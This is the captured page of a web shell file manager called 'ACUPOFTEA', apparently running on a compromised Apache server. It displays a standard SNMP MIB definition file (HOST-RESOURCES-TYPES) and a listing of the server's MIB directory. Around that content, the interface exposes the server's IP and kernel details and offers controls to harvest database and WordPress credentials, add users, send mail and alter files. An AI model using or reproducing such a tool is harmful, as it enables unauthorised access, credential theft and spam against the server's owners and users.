System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
share
/
snmp
/
mibs
/
216.73.216.49
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
HOST-RESOURCES-TYPES.txt
HOST-RESOURCES-TYPES DEFINITIONS ::= BEGIN IMPORTS MODULE-IDENTITY, OBJECT-IDENTITY FROM SNMPv2-SMI hrMIBAdminInfo, hrStorage, hrDevice FROM HOST-RESOURCES-MIB; hostResourcesTypesModule MODULE-IDENTITY LAST-UPDATED "200003060000Z" -- 6 March, 2000 ORGANIZATION "IETF Host Resources MIB Working Group" CONTACT-INFO "Steve Waldbusser Postal: Lucent Technologies, Inc. 1213 Innsbruck Dr. Sunnyvale, CA 94089 USA Phone: 650-318-1251 Fax: 650-318-1633 Email: waldbusser@ins.com In addition, the Host Resources MIB mailing list is dedicated to discussion of this MIB. To join the mailing list, send a request message to hostmib-request@andrew.cmu.edu. The mailing list address is hostmib@andrew.cmu.edu." DESCRIPTION "This MIB module registers type definitions for storage types, device types, and file system types. After the initial revision, this module will be maintained by IANA." REVISION "200003060000Z" -- 6 March 2000 DESCRIPTION "The original version of this module, published as RFC 2790." ::= { hrMIBAdminInfo 4 } -- Registrations for some storage types, for use with hrStorageType hrStorageTypes OBJECT IDENTIFIER ::= { hrStorage 1 } hrStorageOther OBJECT-IDENTITY STATUS current DESCRIPTION "The storage type identifier used when no other defined type is appropriate." ::= { hrStorageTypes 1 } hrStorageRam OBJECT-IDENTITY STATUS current DESCRIPTION "The storage type identifier used for RAM." ::= { hrStorageTypes 2 } hrStorageVirtualMemory OBJECT-IDENTITY STATUS current DESCRIPTION "The storage type identifier used for virtual memory, temporary storage of swapped or paged memory." ::= { hrStorageTypes 3 } hrStorageFixedDisk OBJECT-IDENTITY STATUS current DESCRIPTION "The storage type identifier used for non-removable rigid rotating magnetic storage devices." ::= { hrStorageTypes 4 } hrStorageRemovableDisk OBJECT-IDENTITY STATUS current DESCRIPTION "The storage type identifier used for removable rigid rotating magnetic storage devices." ::= { hrStorageTypes 5 } hrStorageFloppyDisk OBJECT-IDENTITY STATUS current DESCRIPTION "The storage type identifier used for non-rigid rotating magnetic storage devices." ::= { hrStorageTypes 6 } hrStorageCompactDisc OBJECT-IDENTITY STATUS current DESCRIPTION "The storage type identifier used for read-only rotating optical storage devices." ::= { hrStorageTypes 7 } hrStorageRamDisk OBJECT-IDENTITY STATUS current DESCRIPTION "The storage type identifier used for a file system that is stored in RAM." ::= { hrStorageTypes 8 } hrStorageFlashMemory OBJECT-IDENTITY STATUS current DESCRIPTION "The storage type identifier used for flash memory." ::= { hrStorageTypes 9 } hrStorageNetworkDisk OBJECT-IDENTITY STATUS current DESCRIPTION "The storage type identifier used for a networked file system." ::= { hrStorageTypes 10 } -- Registrations for some device types, for use with hrDeviceType hrDeviceTypes OBJECT IDENTIFIER ::= { hrDevice 1 } hrDeviceOther OBJECT-IDENTITY STATUS current DESCRIPTION "The device type identifier used when no other defined type is appropriate." ::= { hrDeviceTypes 1 } hrDeviceUnknown OBJECT-IDENTITY STATUS current DESCRIPTION "The device type identifier used when the device type is unknown." ::= { hrDeviceTypes 2 } hrDeviceProcessor OBJECT-IDENTITY STATUS current DESCRIPTION "The device type identifier used for a CPU." ::= { hrDeviceTypes 3 } hrDeviceNetwork OBJECT-IDENTITY STATUS current DESCRIPTION "The device type identifier used for a network interface." ::= { hrDeviceTypes 4 } hrDevicePrinter OBJECT-IDENTITY STATUS current DESCRIPTION "The device type identifier used for a printer." ::= { hrDeviceTypes 5 } hrDeviceDiskStorage OBJECT-IDENTITY STATUS current DESCRIPTION "The device type identifier used for a disk drive." ::= { hrDeviceTypes 6 } hrDeviceVideo OBJECT-IDENTITY STATUS current DESCRIPTION "The device type identifier used for a video device." ::= { hrDeviceTypes 10 } hrDeviceAudio OBJECT-IDENTITY STATUS current DESCRIPTION "The device type identifier used for an audio device." ::= { hrDeviceTypes 11 } hrDeviceCoprocessor OBJECT-IDENTITY STATUS current DESCRIPTION "The device type identifier used for a co-processor." ::= { hrDeviceTypes 12 } hrDeviceKeyboard OBJECT-IDENTITY STATUS current DESCRIPTION "The device type identifier used for a keyboard device." ::= { hrDeviceTypes 13 } hrDeviceModem OBJECT-IDENTITY STATUS current DESCRIPTION "The device type identifier used for a modem." ::= { hrDeviceTypes 14 } hrDeviceParallelPort OBJECT-IDENTITY STATUS current DESCRIPTION "The device type identifier used for a parallel port." ::= { hrDeviceTypes 15 } hrDevicePointing OBJECT-IDENTITY STATUS current DESCRIPTION "The device type identifier used for a pointing device (e.g., a mouse)." ::= { hrDeviceTypes 16 } hrDeviceSerialPort OBJECT-IDENTITY STATUS current DESCRIPTION "The device type identifier used for a serial port." ::= { hrDeviceTypes 17 } hrDeviceTape OBJECT-IDENTITY STATUS current DESCRIPTION "The device type identifier used for a tape storage device." ::= { hrDeviceTypes 18 } hrDeviceClock OBJECT-IDENTITY STATUS current DESCRIPTION "The device type identifier used for a clock device." ::= { hrDeviceTypes 19 } hrDeviceVolatileMemory OBJECT-IDENTITY STATUS current DESCRIPTION "The device type identifier used for a volatile memory storage device." ::= { hrDeviceTypes 20 } hrDeviceNonVolatileMemory OBJECT-IDENTITY STATUS current DESCRIPTION "The device type identifier used for a non-volatile memory storage device." ::= { hrDeviceTypes 21 } -- Registrations for some popular File System types, -- for use with hrFSType. hrFSTypes OBJECT IDENTIFIER ::= { hrDevice 9 } hrFSOther OBJECT-IDENTITY STATUS current DESCRIPTION "The file system type identifier used when no other defined type is appropriate." ::= { hrFSTypes 1 } hrFSUnknown OBJECT-IDENTITY STATUS current DESCRIPTION "The file system type identifier used when the type of file system is unknown." ::= { hrFSTypes 2 } hrFSBerkeleyFFS OBJECT-IDENTITY STATUS current DESCRIPTION "The file system type identifier used for the Berkeley Fast File System." ::= { hrFSTypes 3 } hrFSSys5FS OBJECT-IDENTITY STATUS current DESCRIPTION "The file system type identifier used for the System V File System." ::= { hrFSTypes 4 } hrFSFat OBJECT-IDENTITY STATUS current DESCRIPTION "The file system type identifier used for DOS's FAT file system." ::= { hrFSTypes 5 } hrFSHPFS OBJECT-IDENTITY STATUS current DESCRIPTION "The file system type identifier used for OS/2's High Performance File System." ::= { hrFSTypes 6 } hrFSHFS OBJECT-IDENTITY STATUS current DESCRIPTION "The file system type identifier used for the Macintosh Hierarchical File System." ::= { hrFSTypes 7 } hrFSMFS OBJECT-IDENTITY STATUS current DESCRIPTION "The file system type identifier used for the Macintosh File System." ::= { hrFSTypes 8 } hrFSNTFS OBJECT-IDENTITY STATUS current DESCRIPTION "The file system type identifier used for the Windows NT File System." ::= { hrFSTypes 9 } hrFSVNode OBJECT-IDENTITY STATUS current DESCRIPTION "The file system type identifier used for the VNode File System." ::= { hrFSTypes 10 } hrFSJournaled OBJECT-IDENTITY STATUS current DESCRIPTION "The file system type identifier used for the Journaled File System." ::= { hrFSTypes 11 } hrFSiso9660 OBJECT-IDENTITY STATUS current DESCRIPTION "The file system type identifier used for the ISO 9660 File System for CD's." ::= { hrFSTypes 12 } hrFSRockRidge OBJECT-IDENTITY STATUS current DESCRIPTION "The file system type identifier used for the RockRidge File System for CD's." ::= { hrFSTypes 13 } hrFSNFS OBJECT-IDENTITY STATUS current DESCRIPTION "The file system type identifier used for the NFS File System." ::= { hrFSTypes 14 } hrFSNetware OBJECT-IDENTITY STATUS current DESCRIPTION "The file system type identifier used for the Netware File System." ::= { hrFSTypes 15 } hrFSAFS OBJECT-IDENTITY STATUS current DESCRIPTION "The file system type identifier used for the Andrew File System." ::= { hrFSTypes 16 } hrFSDFS OBJECT-IDENTITY STATUS current DESCRIPTION "The file system type identifier used for the OSF DCE Distributed File System." ::= { hrFSTypes 17 } hrFSAppleshare OBJECT-IDENTITY STATUS current DESCRIPTION "The file system type identifier used for the AppleShare File System." ::= { hrFSTypes 18 } hrFSRFS OBJECT-IDENTITY STATUS current DESCRIPTION "The file system type identifier used for the RFS File System." ::= { hrFSTypes 19 } hrFSDGCFS OBJECT-IDENTITY STATUS current DESCRIPTION "The file system type identifier used for the Data General DGCFS." ::= { hrFSTypes 20 } hrFSBFS OBJECT-IDENTITY STATUS current DESCRIPTION "The file system type identifier used for the SVR4 Boot File System." ::= { hrFSTypes 21 } hrFSFAT32 OBJECT-IDENTITY STATUS current DESCRIPTION "The file system type identifier used for the Windows FAT32 File System." ::= { hrFSTypes 22 } hrFSLinuxExt2 OBJECT-IDENTITY STATUS current DESCRIPTION "The file system type identifier used for the Linux EXT2 File System." ::= { hrFSTypes 23 } END
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-10-09 10:58:21
..
DIR
-
drwxr-xr-x
2025-10-07 09:19:26
AGENTX-MIB.txt
text/plain
17.05 KB
-rw-r--r--
2025-10-07 09:19:25
BRIDGE-MIB.txt
text/plain
49.75 KB
-rw-r--r--
2025-10-07 09:19:25
DISMAN-EVENT-MIB.txt
text/plain
66.51 KB
-rw-r--r--
2025-10-07 09:19:25
DISMAN-SCHEDULE-MIB.txt
text/plain
24.04 KB
-rw-r--r--
2025-10-07 09:19:25
DISMAN-SCRIPT-MIB.txt
text/plain
62.8 KB
-rw-r--r--
2025-10-07 09:19:25
EtherLike-MIB.txt
text/plain
82.51 KB
-rw-r--r--
2025-10-07 09:19:25
HCNUM-TC.txt
text/plain
4.55 KB
-rw-r--r--
2025-10-07 09:19:25
HOST-RESOURCES-MIB.txt
text/plain
51.31 KB
-rw-r--r--
2025-10-07 09:19:25
HOST-RESOURCES-TYPES.txt
text/plain
10.33 KB
-rw-r--r--
2025-10-07 09:19:25
IANA-ADDRESS-FAMILY-NUMBERS-MIB.txt
text/plain
6.56 KB
-rw-r--r--
2025-10-07 09:19:25
IANA-LANGUAGE-MIB.txt
text/plain
4.28 KB
-rw-r--r--
2025-10-07 09:19:25
IANA-RTPROTO-MIB.txt
text/plain
4 KB
-rw-r--r--
2025-10-07 09:19:25
IANAifType-MIB.txt
text/plain
34.55 KB
-rw-r--r--
2025-10-07 09:19:25
IF-INVERTED-STACK-MIB.txt
text/plain
4.95 KB
-rw-r--r--
2025-10-07 09:19:25
IF-MIB.txt
text/plain
70.01 KB
-rw-r--r--
2025-10-07 09:19:25
INET-ADDRESS-MIB.txt
text/plain
16.39 KB
-rw-r--r--
2025-10-07 09:19:25
IP-FORWARD-MIB.txt
text/plain
45.2 KB
-rw-r--r--
2025-10-07 09:19:25
IP-MIB.txt
text/plain
181.32 KB
-rw-r--r--
2025-10-07 09:19:25
IPV6-FLOW-LABEL-MIB.txt
text/plain
1.98 KB
-rw-r--r--
2025-10-07 09:19:25
IPV6-ICMP-MIB.txt
text/plain
20.56 KB
-rw-r--r--
2025-10-07 09:19:25
IPV6-MIB.txt
text/plain
55.14 KB
-rw-r--r--
2025-10-07 09:19:25
IPV6-TC.txt
text/plain
3.08 KB
-rw-r--r--
2025-10-07 09:19:25
IPV6-TCP-MIB.txt
text/plain
8.65 KB
-rw-r--r--
2025-10-07 09:19:25
IPV6-UDP-MIB.txt
text/plain
5.56 KB
-rw-r--r--
2025-10-07 09:19:25
LM-SENSORS-MIB.txt
text/plain
5.79 KB
-rw-r--r--
2025-10-07 09:19:25
MTA-MIB.txt
text/plain
41.38 KB
-rw-r--r--
2025-10-07 09:19:25
NET-SNMP-AGENT-MIB.txt
text/plain
15.53 KB
-rw-r--r--
2025-10-07 09:19:25
NET-SNMP-EXAMPLES-MIB.txt
text/plain
8.95 KB
-rw-r--r--
2025-10-07 09:19:25
NET-SNMP-EXTEND-MIB.txt
text/plain
9.11 KB
-rw-r--r--
2025-10-07 09:19:25
NET-SNMP-MIB.txt
text/plain
1.99 KB
-rw-r--r--
2025-10-07 09:19:25
NET-SNMP-PASS-MIB.txt
text/plain
3.64 KB
-rw-r--r--
2025-10-07 09:19:25
NET-SNMP-TC.txt
text/plain
4.7 KB
-rw-r--r--
2025-10-07 09:19:25
NET-SNMP-VACM-MIB.txt
text/plain
4.92 KB
-rw-r--r--
2025-10-07 09:19:25
NETWORK-SERVICES-MIB.txt
text/plain
20.51 KB
-rw-r--r--
2025-10-07 09:19:25
NOTIFICATION-LOG-MIB.txt
text/plain
24.12 KB
-rw-r--r--
2025-10-07 09:19:25
RFC-1215.txt
text/plain
1.15 KB
-rw-r--r--
2025-10-07 09:19:24
RFC1155-SMI.txt
text/plain
3 KB
-rw-r--r--
2025-10-07 09:19:24
RFC1213-MIB.txt
text/plain
77.8 KB
-rw-r--r--
2025-10-07 09:19:24
RMON-MIB.txt
text/plain
144.36 KB
-rw-r--r--
2025-10-07 09:19:25
SCTP-MIB.txt
text/plain
44.26 KB
-rw-r--r--
2025-10-07 09:19:25
SMUX-MIB.txt
text/plain
4.54 KB
-rw-r--r--
2025-10-07 09:19:25
SNMP-COMMUNITY-MIB.txt
text/plain
15.13 KB
-rw-r--r--
2025-10-07 09:19:25
SNMP-FRAMEWORK-MIB.txt
text/plain
21.82 KB
-rw-r--r--
2025-10-07 09:19:25
SNMP-MPD-MIB.txt
text/plain
5.37 KB
-rw-r--r--
2025-10-07 09:19:25
SNMP-NOTIFICATION-MIB.txt
text/plain
19.54 KB
-rw-r--r--
2025-10-07 09:19:25
SNMP-PROXY-MIB.txt
text/plain
8.89 KB
-rw-r--r--
2025-10-07 09:19:25
SNMP-TARGET-MIB.txt
text/plain
22.24 KB
-rw-r--r--
2025-10-07 09:19:25
SNMP-TLS-TM-MIB.txt
text/plain
42.9 KB
-rw-r--r--
2025-10-07 09:19:25
SNMP-TSM-MIB.txt
text/plain
8.7 KB
-rw-r--r--
2025-10-07 09:19:25
SNMP-USER-BASED-SM-MIB.txt
text/plain
38.28 KB
-rw-r--r--
2025-10-07 09:19:25
SNMP-USM-AES-MIB.txt
text/plain
2.15 KB
-rw-r--r--
2025-10-07 09:19:25
SNMP-USM-DH-OBJECTS-MIB.txt
text/plain
20.61 KB
-rw-r--r--
2025-10-07 09:19:25
SNMP-USM-HMAC-SHA2-MIB.txt
text/plain
4.3 KB
-rw-r--r--
2025-10-07 09:19:25
SNMP-VIEW-BASED-ACM-MIB.txt
text/plain
33.36 KB
-rw-r--r--
2025-10-07 09:19:25
SNMPv2-CONF.txt
text/plain
8.07 KB
-rw-r--r--
2025-10-07 09:19:24
SNMPv2-MIB.txt
text/plain
28.62 KB
-rw-r--r--
2025-10-07 09:19:25
SNMPv2-SMI.txt
text/plain
8.71 KB
-rw-r--r--
2025-10-07 09:19:25
SNMPv2-TC.txt
text/plain
37.14 KB
-rw-r--r--
2025-10-07 09:19:25
SNMPv2-TM.txt
text/plain
5.64 KB
-rw-r--r--
2025-10-07 09:19:25
TCP-MIB.txt
text/plain
27.89 KB
-rw-r--r--
2025-10-07 09:19:25
TRANSPORT-ADDRESS-MIB.txt
text/plain
16.03 KB
-rw-r--r--
2025-10-07 09:19:25
TUNNEL-MIB.txt
text/plain
27.17 KB
-rw-r--r--
2025-10-07 09:19:25
UCD-DEMO-MIB.txt
text/plain
2.11 KB
-rw-r--r--
2025-10-07 09:19:25
UCD-DISKIO-MIB.txt
text/plain
4.85 KB
-rw-r--r--
2025-10-07 09:19:25
UCD-DLMOD-MIB.txt
text/plain
3.01 KB
-rw-r--r--
2025-10-07 09:19:25
UCD-IPFWACC-MIB.txt
text/plain
7.93 KB
-rw-r--r--
2025-10-07 09:19:25
UCD-SNMP-MIB.txt
text/plain
52.09 KB
-rw-r--r--
2025-10-07 09:19:25
UDP-MIB.txt
text/plain
20.39 KB
-rw-r--r--
2025-10-07 09:19:25
~ ACUPOFTEA - mail.ontime-ae.com